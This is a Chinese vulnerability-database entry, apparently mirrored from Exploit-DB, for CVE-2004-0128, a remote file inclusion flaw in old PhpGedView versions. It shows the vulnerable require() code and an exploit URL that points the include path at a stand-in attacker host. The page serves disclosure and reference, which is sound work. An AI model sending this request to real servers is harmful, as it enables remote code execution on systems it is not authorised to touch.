PhpGedView [GED_File]_conf.php远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107667 漏洞类型 未知
发布时间 2004-01-30 更新时间 2006-11-02
CVE编号 CVE-2004-0128 CNNVD-ID CNNVD-200403-043
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23617
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200403-043
|漏洞详情
phpGedView是一款开放源代码系统,可在线查看Gedcom信息。phpGedView[GED_File]_conf.php文件对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个漏洞包含远程服务器上文件,以WEB进程权限执行任意命令。问题存在于如下代码中:123:if(file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"))require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");124:else{125:$THEME_DIR=$PGV_BASE_DIRECTORY."themes/standard/";126:require($THEME_DIR."theme.php");127:}由于对PGV_BASE_DIRECTORY参数缺少充分处理,提交远程服务器上的恶意文件作为包含文件,就可以以WEB进程权限执行包含的代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/9531/info

It has been reported that PhpGedView may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path.

PhpGedView versions 2.65.1 and prior have been reported to be prone to this issue.

http://www.example.com/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
|参考资料

来源:BID
名称:9531
链接:http://www.securityfocus.com/bid/9531
来源:BUGTRAQ
名称:20040129PHPCodeInjectionVulnerabilitiesinphpGedView2.65.1andprior
链接:http://www.securityfocus.com/archive/1/352355
来源:XF
名称:phpgedview-gedfilconf-file-include(14987)
链接:http://xforce.iss.net/xforce/xfdb/14987
来源:OSVDB
名称:3769
链接:http://www.osvdb.org/3769
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=141517
来源:SECUNIA
名称:10753
链接:http://secunia.com/advisories/10753/